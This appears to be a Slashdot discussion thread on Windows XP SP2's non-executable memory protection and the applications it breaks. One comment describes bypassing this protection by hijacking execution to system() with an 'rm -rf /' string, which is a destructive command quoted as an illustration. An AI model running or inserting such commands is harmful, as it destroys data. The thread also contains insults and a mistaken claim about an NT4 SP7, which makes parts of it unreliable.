Or in *any* environment. My dad got a new laptop the other day and I spent hours being pissed off at XP because some network retardedness is causing the backup client software to fail. It still doesn't work.

My girlfriend's computer had XP installed; it was malfunctioning badly. Erased it and put Windows 2000 on it. Rock solid ever since.

Personally, I had installed XP installed on the machine I use to play games on. XP broke OpenGL support, and since I like OpenGL, I ended up having to erase the machine and go back to 2000. (This computer also had problems with the backup client once running XP; works fine under 2000.)

I've had a couple XP experiences, none of them good. I much perfer Windows 2000 because it just works. Kind of like my Macs. I'm hoping SP2 will fix XP's assanine problems because sometimes you don't have a choice and have to support it.

Duh???

[Tim+Ward]

QA software testers & coders will cry out in anguish over this.....more work for them to do

I don't think the will "cry out in anguish" if they've got any sense. In today's market they'll jump for joy, knowing that their jobs are safe for another few months.

Re:Duh???

[ozric99]

Should this be modded Insightful or Funny? Perhaps +1 SignOfTheTimes :)

Re:Duh???

[Tim+Ward]

Modded as "Funny"??!*!

Only on slashdot. But then slashdot wouldn't have a mod category for "sound commercial sense", would it?

Re:Duh???

[Tenareth]

Exactly... Microsoft's horrible software created a whole generation of programmers that got jobs for no reason... too bad now all the jobs are outsourced because they succeeded in making most programmers idiots.

Sounds like...

[Khan]

...IE will continue to be broken then :-)

Actually, I'm very interested to see if the SP2 pop-up ad blocker will actually work in IE since MS has dragged their feet on this issue. Half the battles we have been fighting lately at work involve IE and pop-ups that install crap without any notification.

Re:Sounds like...

I have tried the pop up blocking in the latest SP2 build and it works flawlessly so far. Hope that answers your question.

Re:Sounds like...

[rben]

Sounds like you should switch to Mozilla or FireFox, both of which have better standards conformance than IE does and both of which have pop-up blocking built-in. Unforunately when you switch you will find that a lot of sites have just assumed that IE will be the only browser ever used and won't work properly with conformant browsers like Mozilla, Opera, and Firefox.

Re:Sounds like...

[Dachannien]

Half the battles we have been fighting lately at work involve IE and pop-ups that install crap without any notification.

Just a suggestion: install a browser other than IE, delete the desktop/start menu shortcuts to IE, and have everyone use the other browser. Mozilla Firefox is a good place to start.

Re:Sounds like...

[Khan]

Oh, I run Firefox as my default browser at work. I'm not the person having the problems. It's the rest of the organization that is having issues. And unfortunately, my management has decided to stick with Internet Exploiter even after all of the crap that has happened. And you are right, most websites assume that IE is the default and write code based for it which of course makes all of the other competent browsers look broken. {insert sarcasm}Yeah, running a monopoly in Corporate America is a Good Thing(tm) {end sarcasm}

Re:Sounds like...

[LousyPhreak]

ever tried mozilla??

has popup blocker, increased security, tabbed browsing built in and all that for free!

so if thats no reason to change, what else?

Re:Sounds like...

Mozilla and its bastard children are way too bloated and slow. Way too huge a memory footprint. Meanwhile, latest Opera betas are paving the way for where browsers should be headed.

Memory protection only on 64-bit platforms for now

[Eponymous+Cowboy]

Actually, only the Itanium and AMD K8 are affected by this immediately; Microsoft isn't yet marking memory nonexcutable by default on the good old x86 processors that we all use.

Regardless, it is trivial for developers to update their code for things like JIT compilers, with a simple function like this:

void MakeMemoryExecutable ( void* buffer, int lengthInBytes )
{
DWORD op;
VirtualProtect(buffer, lengthInBytes, PAGE_EXECUTE_READWRITE, &op);
}

I added that piece of code to my company's JIT compiler some years ago, just to ensure that the proper flags were set. I figured Microsoft would eventually switch to nonexecutable data and stack segments, much like the OpenWall project has done with their Linux patches. Glad to see Microsoft is finally taking the first steps.

MS Outlook

No kidding.

I guess all MS Outlook users will now have to switch to Thunderbird since Outlook won't work in XP SP2.;-)

Seen this coming for ages ...

[zenpiglet]

SP2 is not just another Service Pack. MS are using this as a means to introduce a lot of new stuff. everything from locked-down DCOM settings, to pop-up blockers and a new version of the Windows Installer.

A lot of stuff is going to break, but I think that this is good in a way. MS have finally put security ahead of backward compatibility. Once these changes are in place and apps are working with them, the system is going to be more secure. For once MS should be applauded - yes, you can argue it's a bit late, but at least they're doing it now.

If you want to check out what changes SP2 actually makes, have a read of this white paper:

Changes to Functionality in Service Pack 2 for Microsoft Windows XP

Lengthy, but worth a read, especially if you have apps that you think might be affected.

A downloadable version is available here.

Re:Seen this coming for ages ...

i dont care to much about windows anymore, but lets just wait and see if it all turns out as good as you try to make it sound...

Oh Great

[Crazy_Vasey]

I hope there's a way for the user to sidestep this, because it's bound to affect a load of old software and games that simply aren't going to be updated.

Re:.NET framework

[Xoder]

He's not a programmer. This is important. From the end-user perspective, .NET is just a ill-formed buzzword. I do not doubt the idiocy of MFC (although I've never used it), and the improvement that .NET brings (although I've never used it), but as a Windows user, not developer, I can't see the difference or the point in installing the .NET framework.

How could you tell?

[ostiguy]

Bidip-crash! thank you, thank you, I'll be here all night

Good

[quantum+bit]

Microsoft has pandered to broken applications for far too long. Maybe if they finally get over their "backwards compatibility at all costs" attitude, they'll get around to fixing some of the fundamental flaws in their OS.

I highly doubt that Linux authors would think twice about breaking buggy apps to force the issue.

Re:Good

[jamshid42]

Actually, they haven't had the "backwards compatibility at all costs" attitude since NT4. They do attempt to provide mostly backwards compatibility, but no where near "at all costs."

Re:Good

[Eponymous+Cowboy]

I highly doubt that Linux authors would think twice about breaking buggy apps to force the issue.

Actually, Solar Designer's non-executable stack patches have been consistently refused for inclusion in the official Linux kernel, for at least six years now, even though every sysadmin I know uses them on any Linux machine put out on the Internet. (Making the stack non-executable eliminates the threat from many buffer overrun problems, for example.) Most all of his other patches have made their way to the kernel quickly (his security hardening patch is now a fraction of the size it used to be, because most of it has been moved into the official kernel over the years).

One reason given repeatedly for not including a non-executable stack in the stock kernel was because things like GCC's trampolines, used in nested functions (something hardly any programs use, as it's not standard C), don't necessarily work when the stack is non-executable without special considerations. And those special considerations can't catch 100% of the cases, and those programs crash unless they are redesigned. Which is, of course, exactly the opposite of what you suggested.

(There is also the "false-sense-of-security" argument: the patch has not been included because it gives admins a false sense of security. I find this weak. In a nonperfect system, every additional bit of security helps. Having passwords on systems also give us a false sense of security, when there are other ways for hackers to break in. But we still put passwords on our machines.)

Re:Good

[CycoChuck]

I highly doubt that Linux authors would think twice about breaking buggy apps to force the issue.

It's really not an issue in Linux. Open source allows you to fix an app if a security patch breaks it. Can't say the same about MS.

Re:Good

[PSC]

I highly doubt that Linux authors would think twice about breaking buggy apps to force the issue.

(Nods agreement.)

Trouble is, there's not much choice but install the service pack, thus not much choice but breaking existing applications. You are now completely at mercy of the application vendors, which may or may not provide fixes. Most likely, they will force you to buy an upgraded version... which in turn may or may not work with all your legacy stuff. (Note that Microsoft is itself one of these application vendors, thus the temptation to generate a stream of revenues via forced upgrades is definetely given.)

With Open Source applications, on the other hand, even with older apps, you have a decend chance that broken applications will be fixed, even if you (as a company) have to pay someone to do it.

Open Source helps you mitigate the risk of being left out in the cold by software vendors. Depending on your business, this risk far outweights the financial benefit of a (really or perceivedly) smaller TCO.

Re:Good

[Dirtside]

You know, considering how much money MS makes from getting their customers to upgrade to the latest versions of (e.g.) Windows and Office, it seems a little odd that they actually would be so anal about backward compatibility. It seems like once they had a monopoly, they'd want to decrease the amount of backward compatibility, in order to get more people to upgrade. Hmm.

Re:.NET framework

go on, convince me as a user why i should spend n hours on my 56k modem to download 25mb of what ? what benefit does it bring me ? so i can run some clowns 175k application that others can do in 75k of C++ ?

the parent is right on

Re:.NET framework

[barjam]

.net framework will no longer be an option when the next version of windows comes out. .net isn't a failure. Companies are switching to it en mass (think buis apps) because it allows java like development cycles with native looking apps.

Re:we can live in hope

Try a well written app like azureus and then come back and tell me that java is at fault rather than it's GUI toolkits.

Microsoft just can't win

[Neillparatzo]

Windows apps suffer from buffer overflows, Slashdot bags on Microsoft for having buffer overflows.

Windows adds NX security to prevent buffer overflows, Slashdot bags on Microsoft for breaking a few apps in the process (apps which were arguably broken in the first place, just the spec was never enforced).

I understand there's a slight bias on this site, but Jesus Christ you guys.

Re:Microsoft just can't win

Windows apps suffer from buffer overflows, Slashdot bags on Microsoft for having buffer overflows.

There is a biased nature on Slashdot, I'm not disputing that. Bagging though? Thats something like I'd see when someone goes on about something. Personally I like Microsoft products, but I am fully aware of their capacity to produce products laden with bugs and introduce service packs as a solution for this. IMHO Buffer Overflows are a bad thing and any company that produces programs that routinely has problems of this nature should be 'bagged' as you put it.

Windows adds NX security to prevent buffer overflows, Slashdot bags on Microsoft for breaking a few apps in the process (apps which were arguably broken in the first place, just the spec was never enforced).

Memory Security isn't a prevention of Buffer Overflows. Its containment. If the spec wasn't enforced, why? Aren't these issues exactly the kind of thing Microsoft should be addressing, otherwise how can even the service packs be sure to not contain the same mistakes?

The apps aren't broken, they work. Try and argue that they were broken then you're really saying anything with a buffer overflow vulnerability is essentially broken. Like parts of the operating system? Any system that has a fault, should not require something like a 120MB download to fix it.

The operating system is being fixed with what is essentially a big patch to stop buffer overflows, while breaking a lot of apps (not all from redmond surprise, surprise) in the process.

This will happen first, then if lucky they'll fix the apps.

There is a biased nature on this site, yes. Your post itself, albeit short contains a similar baised nature.

Myself, I don't really care about XP, I prefer Windows 2000 and although many will may argue differently have found Windows 2000 to be more stable and encountered less problems.

I only tend to move operating systems when the next version is more stable (after a period of use at work).

Re:Microsoft just can't win

[iggye]

Hello Neillparatzo,

Yes, you are correct of course. But please don't advertise it on Slashdot.

You see, Slashdot is a convenient source for all the anti-capitalist, socie/commie whiners to go to and spend their time on... so the rest of us can work where the money is (the Microsoft World) and earn our dough.

Please, don't blow our cover.

Thanks for understanding,
Iggy

Re:Microsoft just can't win

[Liselle]

The fact that you got modded up to +5 Insightful in a heartbeat should be answer enough for you. There are plenty of lurkers here that don't have the "damned if you do, damned if you don't" hatred for Microsoft. This site is more than just the opinions of those brave enough to post, or the crackbrained comments the editors add to the write-ups.

Re:Microsoft just can't win

[Neillparatzo]

"If the spec wasn't enforced, why?"

Hardware wasn't capable of enforcing it, at least not on x86. The no-execute bit is something new they're adding for AMD64.

I could go off on a tangent about how this sort of thing has happened before with 9x vs. NT and DWORD stack alignment, but that'd be increasingly unrelated. My point is it's the app's fault for not playing by the rules.

Re:Microsoft just can't win

Slashdot is a convenient source for all the anti-capitalist, socie/commie whiners to go to and spend their time on... so the rest of us can work where the money is

Ah, but you have to understand that those whiners also sell, implement, or use MS software to make money every day. Their "deeply-held socio-political beliefs" don't actually carry as far as affecting their real-world choices.

Re:Microsoft just can't win

[gl4ss]

they're breaking compatibility in a friggin update pack.

.

Re:Microsoft just can't win

[mangu]

Windows adds NX security to prevent buffer overflows, Slashdot bags on Microsoft for breaking a few apps in the process

But why can't Microsoft fix the problem without breaking the apps? To fix things by breaking others is too easy, the process is popularly known as "throwing the baby out with the wash water".

Probably the problem arises from that old Microsoft trick of "embracing and extending". They have put so many tricks in their APIs before, in order to break applications that competed with Microsoft ones, that now it's very difficult to get rid of those tricks without breaking some applications.

Well, I think Microsoft bashing is fully justified in this case. If they had had one well documented set of APIs to begin with, there would be far less security problems and the few problems that existed could be fixed without breaking anything. On the other hand, their own applications, such as MS-Office, would have to face the competition based on their own merits, instead of relying on undocumented details in the API...

Re:Microsoft just can't win

[Neillparatzo]

Microsoft actually goes to great lengths to ensure that certain applications will work under each new version of Windows. Otherwise, customers would have good reason not to buy the newer version of Windows. When an app breaks, it's almost always a matter of that app digging its own grave by doing something bizarre, short-sighted and incompatible.

This according to Raymond Chen, anyway.

Re:Microsoft just can't win

[scrytch]

The fact that you got modded up to +5 Insightful in a heartbeat should be answer enough for you.

Silent moderation, not really enough. Hardly anyone bothers to stand up to the rampant editorial bias around here, from the article selection to the snippy commentary inserted after most of them.

Homogenized corporate media occasionally enjoys a story about the ills of homogenized corporate media. Then they go right back to conforming to the ratings machines. I come to slashdot for the community now, the articles are informative or useful only once in a while.

Re:Microsoft just can't win

>This site is more than just the opinions
>of those brave enough to post

Yes,
It's also read by a special forces team
at Microsoft which loves to astroturf
any opinions which might be considered
negative to Microsoft'$$ bottom line.

Re:Microsoft just can't win

I think you've gone off on a tangent really about what the guy was saying, he was talking about software not hardware enforcing it. Most buffer overflows are generated via non-captured or filtered I/O of the program or application. Sure theres a lot of work involved in controlling this however, that is time that should be spent.

Its a little like complaining to Intel that your programs break because they didn't make it easier enough for you.

Re:Microsoft just can't win

[ASUNathan]

Slashdot does not speak with one voice.

For some people, the backwards compatability losses are much more important than the security gains. These people are complaining, possibly because this will involve a lot of work for them.

For others, the security gains are more important than backwards compatability losses. These people are cheering.

From what I've read so far (at +3, YMMV), opinions seem to be fairly evenly split.

Re:Microsoft just can't win

[geekoid]

since MS has a history of not playing fair, I'll wait until we see the effects of this service patch in action for a few months before praising this action.

I hope it's good.
I suspect there doing this now so that all the problems created will be viewed as XP issues, and not longhorn issues.
I wouldn't be surprised to see several patches that are mostly test grounds for longhorn functionality.

Re:Microsoft just can't win

[Neillparatzo]

Are you suggesting I'm getting paid to say this? I wish! Where do I sign up for that special forces team?

Re:These are a few insecure programs that won't wo

[Helvick]

Rest easy bud (or maybe not) - QT, RealPlayer and Firefox certainly won't break, I use 'em and have a beta of SP2. No issues, at least on my setup, with these or any other of my apps. All Windows Service Packs break "some" applications, and the same applies to other OS's, the difference here is that MS are providing tools to help developers identify and rectify them in advance - that's certainly a good idea.

The real problem is that the benefits it (should) bring will not get deployed to the bulk of systems that need it - at 210Mb I can't see the majority of systems out there that really need it getting the whole thing downloaded, at least not within any reasonable time frame. Hopefully by the time it is actually released they will have a lite version on Windows update that can push the security improvements in a much smaller package.

Their decision to at least try to implement some long overdue fundamental improvements to the security of the architecture is to be welcomed no matter how over due it is. However despite that their decision not to add any outgoing filtering capability to the ICF doesn't make any sense to me and seems, well, just stupid really.

Pain in the ass, but a step in the right direction

[keath_milligan]

Backward compatibility has been a bit of a sacred cow in Windows for too long. Much of Windows' excess complexity and security deficiencies can be directly attributed to compromises made for the sake of compatibility with old applications.

Re:.NET framework

[NSash]

.net framework will no longer be an option when the next version of windows comes out.

Microsoft's giving up that quickly?

I thought...

[Gyorg_Lavode]

that the memory protection was only usable w/ processors that flagged memory.

Re:I thought...

It is possible to use the segmentation facilities of an IA32 processor.

Most IA32 operating systems don't do this. Instead they just set the code segment to cover the entire address space thus allowing things such as buffer attacks. I beliave that one of the few operating systems that even attempts to use segmentation in place of a per page execution bit is OpenBSD.

Applications reported having SP2 problems

[Jugalator]

Here's a list of a few applications that has been reported having problems in the latest betas of SP2, compiled from comments at Neowin when they posted these news:

- Zone Alarm 2 (uninstall stops working)
- BS Player (driver fail to load)
- Roxio Easy Media Creator 7
- Microsoft Intellipoint 5.0
- Azureus BitTorrent client
- ATI's Rage3DTweak for Radeon
- Easy CD Creator 5
- eMule
- Tritton NAS-120's Managment Interface
- Leadtek WINFAST TV PVR (driver fail to load)
- ISO Recorder Powertoy

Also, a user reports the Windows XP SP2 firewall blocking incoming FTP traffic even without an installed firewall, and XP's built-in disabled.

Maybe it's "beta diseases", but it does seem like a lot to break for a service pack, even in a beta. These are usually quite stable as they contain mostly bugfixes, not Win32 API changes (which these problems are supposedely caused by).

Re:Applications reported having SP2 problems

BSPlayer, Rage3DTweak, and eMule all work just fine for me and I have yet to run into any software that won't run in the latest build.

Re:Applications reported having SP2 problems

[Repugnant_Shit]

Uhoh. Azureus is written in Java. Does that mean all Java apps will stop working?

Re:Applications reported having SP2 problems

[Lxy]

Maybe it's "beta diseases", but it does seem like a lot to break for a service pack, even in a beta.

Shortly after SP2 was announced beta, MS announced its pet project XP Reloaded. My guess is that SP2 has a lot of development stuff for a new OS. Even before XP Reloaded was announced, MS expressed its concern that Longhorn was way off in the future. SP2/XP Reloaded is more of an interim release than a service pack, that's why you're seeing so many changes.

Re:Applications reported having SP2 problems

[RealityThreek]

"XP reloaded" is supposed to be a seperate release, after SP2 is out. I find it funny that it's also been called "shorthorn" by some people inside MS.

Alright, MS is finally working on security. It's time for us to get working on UIs.

Re:Applications reported having SP2 problems

[qcubed]

add another application that stops working completely. network associates' mcafee virusscan enterprise 7 is no longer able to automatically update because the mcafee framework service, although loaded, isn't loaded. thus far, however, i haven't had a problem with intellipoint 5.

Re:Applications reported having SP2 problems

[Tony+Hoyle]

Also the Matrox display drivers (I reported it to matrox and their response was 'so what, it's beta'... expect lots of unhappy users when SP2 goes gold).

Plus Mozilla & Digiguide.

Re:Applications reported having SP2 problems

[Phil+Wilkins]

> Roxio Easy Media Creator 7

A Roxio product, with, problems? Say it ain't so!

Re:Applications reported having SP2 problems

S800 Firewire disks also get broken with SP2. They only work at S100 speeds. Admittedly, this was sort of broken on Windows before but the disk could hack things to make it work. Now, Windows blocks any attempt to go faster that the slowest speed.

Re:These are a few insecure programs that won't wo

[shadewind]

If this breaks insecure apps like Mozilla/Netscape/Firefox, the logical thing would be that it smashes IE into oblivion.

execution-restricted memory by default

[braddock]

This is a good thing that OSes like Solaris have had available for years. OpenBSD has recently changed their default memory page allocation permissions on architectures where it's possible for a similar effect. Patches exist under Linux to do it. However, I believe in all these cases that you can still REQUEST memory allocations that do NOT have the restriction if you are doing JIT compilation or whatnot.

Microsoft isn't stupid. I'm sure they'll figure out a way to allow old apps to run with the old allocation behavior. Their entire business relies on legacy compatability. At worst you'll need to set some flag on the application launch.

The other thing to note is that crackers have also had ways to defeat execution-protected memory for years as well. It makes a buffer overflow exploit a bit more difficult, but where there is a will there is a way.

For example, even if the protection prevents you from writing executable code directly into memory, you can still typically do things like overwrite the stack and hijack the program's execution to a system call with malicious parameters (in Unix, the classic call to hit is system()...no custom code execution required, just a 'rm -rf /' string somewhere in memory).

Braddock Gaskill

Re:execution-restricted memory by default

But, and this is a big but, the memory protection features only work on X86-64 processors. Your Pentium 4 will still allow buffer overflows to occur. AMD added a bit in page table entries which allows you to mark a page as non-executable. Since Intel seems to be headed the x86-64 route, we'll hopefully see them support the same feature.

X86-32 supports an execution bit for memory segments, but virtually all operating systems just create a huge 4 GB code segment which uses the same memory as the huge 4 GB data segment they created.

I suspect that buffer overflow attacks will instead turn into denial of service attacks, since you would get a page protection fault of some sort and the program would crash. This still is a huge step in the right direction, but doesn't relieve programmers from the responsibility to write secure code to begin with.

Sun Hot Spot

[codepunk]

Sounds like a rather nice way of introducing stability and or compatibility problems to java by not allowing Sun's Hot Spot just in time compiler to work correctly.

Re:Sun Hot Spot

[Juergen+Kreileder]

Sounds like a rather nice way of introducing stability and or compatibility problems to java by not allowing Sun's Hot Spot just in time compiler to work correctly.

That's wrong. HotSpot just has to mark the memory containing the generated code executable. Recent Blackdown (non executable mappings aren't Windows specific) releases already do that and future Sun releases will do the same.

Re:Sun Hot Spot

Facts have no place in a Slashdot discussion, sir.

Re:Sun Hot Spot

[Chester+K]

Sounds like a rather nice way of introducing stability and or compatibility problems to java by not allowing Sun's Hot Spot just in time compiler to work correctly.

Had Sun followed the instructions for making executable code pages for their JIT like MSDN has explained how to do since Windows 95, then the Hotspot compiler would work just fine.

If you want to blame someone here, blame Sun for not coding their stuff correctly in the first place.

Re:.NET framework

[SlightOverdose]

Understandable. But I presume .NET will be (or already is) bundled with all new copies of windows sold, so it won't be an extra download. It will just work.

A good thing

The fact of the matter is that developers, particularly C++ developers like to do a lot of unnecesary tricks with memory. They like to push pointers around, execute from the stack and all.

This breaks abstraction, and makes their code very much hardware dependent. I'm glad they will be punished for their sins.

Microsoft's Long-Term Perspective

[Jonathan+Quince]

.NET is a FAILURE (apart from the most stupidist name ever)

You evidently don't understand how Microsoft works as a business. Unlike most software shops, they take the long-term perspective. Many of their competitors have learned this the hard way. (E.g., "Internet Explorer is a failure." As of version 3, it was a failure in terms of market penetration, but MS didn't care.) Full Microsoft product cycles typically take about ten years.

Every major new Microsoft product or technology takes the better part of a decade to take over the desktop. By about 2007-2008 or so, once there starts to be a large installed base of Longhorn machines (which will have .NET preinstalled), .NET will really start to take off for shrinkwrap applications. Five years down the line from there, it will be just about ubiquitous. In the meantime, programmers are learning it and it's becoming a familiar feature of Visual Studio (an excellent IDE).

Re:Microsoft's Long-Term Perspective

[Xpilot]

Every major new Microsoft product or technology takes the better part of a decade to take over the desktop. By about 2007-2008 or so, once there starts to be a large installed base of Longhorn machines (which will have .NET preinstalled), .NET will really start to take off for shrinkwrap applications. Five years down the line from there, it will be just about ubiquitous.

Of course, the reason that MS junk becomes so ubiquitous is that they have the luxury of being a monopoly, so like it or not they can shove practically *anything* down your throat, good or bad.

I know hordes of Microsoft fans who think anything out of Redmond is awesome, no matter how crappy it is. It reminds me of "Animal Farm", where some of the animals claim that the water tastes sooo much sweeter ever since Napoleon took over the farm.

Re:Microsoft's Long-Term Perspective

E.g., "Internet Explorer is a failure." As of version 3, it was a failure in terms of market penetration, but MS didn't care.

Market penetration? IE3 was a failure in just about every way.

I'm inclined to agree that .Net sucks, but I wouldn't call it a failure. What's the point of going to a virtual machine if it doesn't buy you anything? At least with Java you have platform independent binaries.

People are using it though, mostly "halfway developers" who don't want to have to learn C++, but there's a lot of them.

Re:Microsoft's Long-Term Perspective

[Overly+Critical+Guy]

I know hordes of Microsoft fans who think anything out of Redmond is awesome, no matter how crappy it is. It reminds me of "Animal Farm", where some of the animals claim that the water tastes sooo much sweeter ever since Napoleon took over the farm.

Replace "Microsoft" with "Linux," and "Remond" with "OSS."

Re:Microsoft's Long-Term Perspective

There was evidence to prove that Overly Critical Guy is a lying cocksucker, but he deleted it. Think independently.

Re:.NET framework

[Xyrus]

I know, I know. Don't feed the troll. You may think .NET is a failure, but there are a lot of companies who do not think so. And if it was such a failure, why are the programmers in the open source computing community devoting the time and effort to make a linux version (mono, etc.). And the same applies to java. "Download my free 175 KB java app" that requires a hefty download from sun. And that's just for one language. However, I will agree that .NET is a really lame name. ~X

Re:You cannot make an omelet without breaking eggs

[Darkangael]

I'm actually looking forward to seeing what they are doing with Longhorn(not TCPA as a whole or anything, but some of its related features perhaps). I'm a long-time linux fan and don't think I would replace linux completely any more than I would replace windows completely, but Longhorn is looking like a large step in the right direction in terms of security and reliability, as well as using .NET which looks like a fairly easy to use API.

These additions to XP make it look even more like they are finally doing the right thing, and the .NET framework might even end up being truly multiplatform in the future, which is a Good Thing.

Hilarious

Gee... I thought .NET was going to rid the world of all its troubles, cause the planets to align, end DLL hell, etc.

Re:.NET framework

But we're talking about the fact that on current versions of windows, no one on a slow connection is going to bother to spend time downloading a large package.

Re:These are a few insecure programs that won't wo

Dude at 210 megs you're running the beta with all the debug stuff. It's not going to be anywhere close to that big when final release is compiled.

Re:.NET framework

[khakipuce]

You are quite right, this is what really prevented Java applets from getting of the ground - 12-20Mb runtime download.

The thing is that in 2-4 years pretty much every one will have the .NET frame work as part of the OS (even MONO on Linux) so they will not have to down load it. Then .NET will become mainstream.

This is exactly what's needed

[Stevyn]

Think of apple, they were never to worried about backwards compatibility and their os is more stable because of it. All those programs that weren't compatible with osx had to be updated to ensure they'd work with the changed operating system. True, the change was big because they went to a unix varient, but they still had the balls to tell developers to adjust or lose customers.

Now microsoft has always tried to make it easy to run old programs. Think of how long dos lasted so businesses could use their old proprietary programs. This caused a lot of problems with windows crashing. Windows xp was supposed to fix that shit, but now a new slew of shit has come about. Now what they're saying with sp2 is that they recognize their customers want security and stability over backwards compatibility.

The reason they're finally starting to do this is probably to compete with linux since those people most likely had to leave their old familiar apps with new ones. They see that people would rather deal with the adjustment of a new look and feel over constant reboots.

Now while everyone can point fingers and laugh at .NET, this is very smart for them. It makes it easier and cheaper for developers to make consistant apps in current and future versions of windows. If developers rely on ms code to handle the grunt work and they just do the stuff that makes their program, then they have a lot less overhead. And with microsoft grabbing it's balls and betting on security and stability, they can handle the backend bugs with their updates. True, that requires them to actually patch, but if they start with a much more stable and efficient groundwork, you'll see a lot less patches then now.

Remember guys, microsoft isn't stupid.

Re:This is exactly what's needed

[Ironsides]

Think of how long dos lasted so businesses could use their old proprietary programs.

DOS is dead. They have been using an emulator to run dos ever since 2k and possibly as far back as 98.

Re:This is exactly what's needed

[tritone]

Think of apple, they were never to worried about backwards compatibility and their os is more stable because of it. All those programs that weren't compatible with osx had to be updated to ensure they'd work with the changed operating system.

True, but Apple does allow for compatibility with older applications through the classic envionment. I was recently amazed to find that a version of MissleCommand that I had for 1984, the year of the introduction of the Mac, still worked with OS X.

Re:This is exactly what's needed

"DOS is dead. They have been using an emulator to run dos ever since 2k and possibly as far back as 98."

Which is exactly why he used the word "lasted'. Past tense you know.

Re:This is exactly what's needed

hm. interesting points you make about how microsoft includes backwars compatibility with DOS, and even compare them to apple.
So Let's see here...

MacOSX(10), which introduces a HUGE (complete) underlying change in the operating system breaks binary compatibility with OS9 and previous. Apple realizes customers can't wait for Adobe to release a new Photoshop. So, Apple includes OS9 and an emulator (sandbox?) for some backwards compatibility for those brave enough to go to it's new, radically improved OS.

Didn't the first Macs with OSX even come with a dual boot configuration for OS9? For no extra charge?

Windows SP2... not even a POINT release change from Microsoft... breaks application compatibility and Microsoft says "suck my balls". Now I realize this probably should have happened at the change from Memphis to Cairo codebase, MS didn't because of application compatibility. Now they decide, for an OS update, it should break compatibility.

Now, compare Apple to MS again.

Apple: breaks compatibility with a drastic change, but offers a solution to fix the problem

Microsoft: doesn't

Re:This is exactly what's needed

[Stevyn]

Yeah, but I thought osx was so different almost nothing worked? The changes in sp2 are only going to break some programs that were not coded as best as they should have been. Assuming I'm correct about osx, microsoft isn't forcing every developer to change their code to .NET, just fix code that doesn't handle memory and other components properly.

Re:This is exactly what's needed

Er, not exactly. For Mac OS X, Apple provided a VM called Classic that runs most older programs in a collective memory space. Programs that wrote directly to hardware (e.g. device drivers) did not work, but most applications run ok in Classic. So the current situation is a lot like the introduction of Mac OS X.

To run natively, most programs required anything from a recompile to serious modification and a recompile. But I guess that's the price you pay for lickable interfaces. :-)

Doesn't matter?

[An'Desha+Danin]

"It doesn't really matter how long it is going to take you to do the work; security is an important issue and developers need to start doing that work now," Goodhew said. Tell that to the college student who installs SP2 the night before the deadline for his midterm paper only to discover that his word processor doesn't work any more beause of "security issues."

Re:Doesn't matter?

like anyone cares about school children and their issues, life goes on as long as buisness keeps making money children will always come last

Re:Doesn't matter?

[CrackerJackz]

Hey! you still have notepad! :)

Re:Doesn't matter?

[pclminion]

Tell that to the college student who installs SP2 the night before the deadline for his midterm paper only to discover that his word processor doesn't work any more beause of "security issues."

Sorry, but anyone who makes major changes to the system when it's in the middle of doing something extremely important, is a fucking idiot.

"Yeah, I know I was planning on driving to Chicago tomorrow, but I thought there'd be no problem installing a new head gasket twenty minutes before I planned to leave... How was I supposed to know this was not a good idea?" Oh for Christ's sake.

Re:Doesn't matter?

[The+Spie]

>>"Yeah, I know I was planning on driving to Chicago tomorrow, but I thought there'd be no problem installing a new head gasket twenty minutes before I planned to leave... How was I supposed to know this was not a good idea?" Oh for Christ's sake.

The last time I drove to Chicago (for Christmas to visit my family), I needed to have my head gasket replaced beforehand. It took them a day longer than they said it would, I was able to get my car just before COB on Christmas Eve, and barely made it after an eight-hour drive. Thanks for the unpleasant memories.

Only install odd numbered service packs

[Schemat1c]

As superstitious as this sounds I have found this to be true over the years with Microsoft. Almost without fail the even numbered SP's have broken features and the odd numbered ones fix them. I'll wait for SP3.

Besides, the combination of my Netgear firewall, McAfee Virusscan and just not opening strange attachments in my email protects me just fine.

Re:Only install odd numbered service packs

[drwtsn32]

Almost without fail the even numbered SP's have broken features ...

Let's test your theory... NT4 SP6: works great. Win2K SP4: works great. XP SP2: not out yet.

I don't know what you base your inverse Star Trek odd/even rule on, but it's not the same thing I've experienced with service packs.

Re:Only install odd numbered service packs

[Schemat1c]

Let's test your theory... NT4 SP6: works great. Win2K SP4: works great. XP SP2: not out yet.

NT4 SP6 was shit, SP6a fixed most of the problems but SP7 is way more stable. I've never used SP4 for W2k, SP3 was just fine and stable for me. XP SP2, Microsoft themselves have said that it will break some applications.

Re:Only install odd numbered service packs

[Tadrith]

NT4 SP7...?

Could you tell me what dimension you live in? Or was Microsoft just kidding about this?

Re:Only install odd numbered service packs

[drwtsn32]

The difference between SP6 and SP6a are minimal. SP6a only fixed an obscure problem with Lotus Notes. SP7 doesn't exist.

Win2K SP3 is fine, yes, but so is SP4.

WinXP SP2 I have tried and it hasn't broken any apps that I use.

Re:Only install odd numbered service packs

There are still a few hotfixes after SP6a, those can be considered SP7 (or at least what MS refers to them as "pre-SP7").

Re:Only install odd numbered service packs

Last I heard that SP4 breaks some HP drivers.

Re:Only install odd numbered service packs

[Tadrith]

Well, yes, but that hardly constitutes running SP7.

Re:Only install odd numbered service packs

[Tony+Hoyle]

SP4 changed the NTFS format and rendered a number of machines unbootable. Also because of the format change you couldn't uninstall it either...

good move

[niklaus]

breaking backwards compatibility is what makes linux 's code much more elegant and easier to maintain than the windows source. But of course it's much harder to get a fixed version of some obscure piece of proprietary software, made by a company that maybe doesn't even exist anymore, than it is to recompile a piece of free software (or even fix it yourself). Another problem is that lots of people are still running windows 9x or will not install service packs. so the worms won't go away overnight. It's a step in the right direction by microsoft, but if it breaks too many old apps, a lot of people might get pissed off and give linux a try.

Pot to Kettle

[H8X55]

In a quote from Tony Goodhew, a product manager in Microsoft's developer group says 'It doesn't really matter how long it is going to take you to do the work; security is an important issue and developers need to start doing that work now.

Not to flame, cause i'm not like that, but c'mon!?!

Pot to Kettle, "Guess who's black?"

Finally...

[Spoing]

If this is true, I applaud Microsoft for moving in the right direction. Windows can be moderately secured, though it is such a pain to do so.

If program that does not follow good security practices breaks, so much the better.

Large service-packs.

[eddy]

The "problem" is that microsoft SP/patches aren't patches, they're archives of files to replace/delete.

That's a good and "safe" default, but someone with MS resources ought to be able to buy RTPa... I mean, innovate a real patch framework. Especially with Windows Update. MS just needs to 'diff' the major versions. If a file to be updated doesn't hash to one in that set, replace it fully.

Re:Large service-packs.

[zenpiglet]

Actually MS have a very cool technique they use that sounds very much like what you mention. It is known as "Intra-package Delta Compression" (IPD). Essentially, they compress one file with a 'normal' compression algorithm, then compress evything else by just packaging the difference (or 'delta') with this file.

